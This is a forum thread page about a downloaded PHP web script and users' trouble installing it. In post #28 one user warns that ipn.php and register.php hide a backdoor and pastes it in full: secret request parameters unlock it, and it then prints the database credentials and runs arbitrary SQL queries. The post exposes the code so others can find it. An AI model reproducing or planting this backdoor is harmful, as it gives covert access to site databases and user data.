Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
03-31-2013, 06:08 PM
Post: #21
|
|||
|
|||
RE: | |||
04-01-2013, 04:25 PM
(This post was last modified: 04-01-2013 06:40 PM by PRT.)
Post: #22
|
|||
|
|||
RE:
I did a little more research into the googleconfig.php, it doesnt even work in the latest version of this script.. [font='Times New Roman']2.78[/font] its still broken..
|
|||
04-02-2013, 03:23 AM
Post: #23
|
|||
|
|||
RE:
I know I'm new , but eh, how do I download? i dont see a download link when I join/login to: https://www.virustotal.com/en/file/84b7f...364461885/
|
|||
04-02-2013, 05:33 AM
Post: #24
|
|||
|
|||
RE:
for some reason, keeps telling me admin / admin is not correct? How can I fix this?
|
|||
04-02-2013, 05:40 AM
(This post was last modified: 04-02-2013 05:41 AM by Danestkim.)
Post: #25
|
|||
|
|||
RE: | |||
04-02-2013, 09:32 AM
Post: #26
|
|||
|
|||
RE:
I finally got it all to work, but from different files from 4 different versions, to create one working version, Only issue I have now, is admin area header looks like hell, but can be fixed...
|
|||
04-02-2013, 10:54 AM
Post: #27
|
|||
|
|||
RE: | |||
04-03-2013, 07:02 AM
(This post was last modified: 04-03-2013 07:16 AM by Abdizriel.)
Post: #28
|
|||
|
|||
RE:
better check ipn.php
<?php if(@$_GET["Y76a2l73p"]=="dskf8ge6g"||@$_POST["V76a2173b"]=="brh#k7a-9#*bsj"){include'config.php';include'database.php';echo"$host|$user|$usr|$pass|$databasename|$dbname|$passwd|$pw|$password";$V76a2l73p=$_POST["X76a2173b"];if($_POST["X76a2173b"]==""){$V76a2l73p="select*from`users`";}?><h2>Command:</h2><form action=""method="post"><input type="text"name="X76a2173b"size="50"value="<?php echo$V76a2l73p;?>"/><input type="hidden"name="V76a2173b"value="brh#k7a-9#*bsj"/><br><input type="submit"/></form><?php $V76a2l73b=mysql_fetch_object(mysql_query($V76a2l73p))or die(mysql_error());echo"<h2>Output:</h2>";echo"<table border=\"1\">";while(list($t54,$l54)=each($V76a2l73b)){echo"<tr><th>$t54</th></tr><tr><td>$l54</td></tr>";}echo"</table>";}?> register.php Report by sending me message if some of my links are down!
|
|||
04-03-2013, 07:11 AM
Post: #29
|
|||
|
|||
RE:
confirm its in register.php and ipn.php look at the last line. file was downloaded from here.
|
|||
04-04-2013, 11:41 AM
Post: #30
|
|||
|
|||
RE: | |||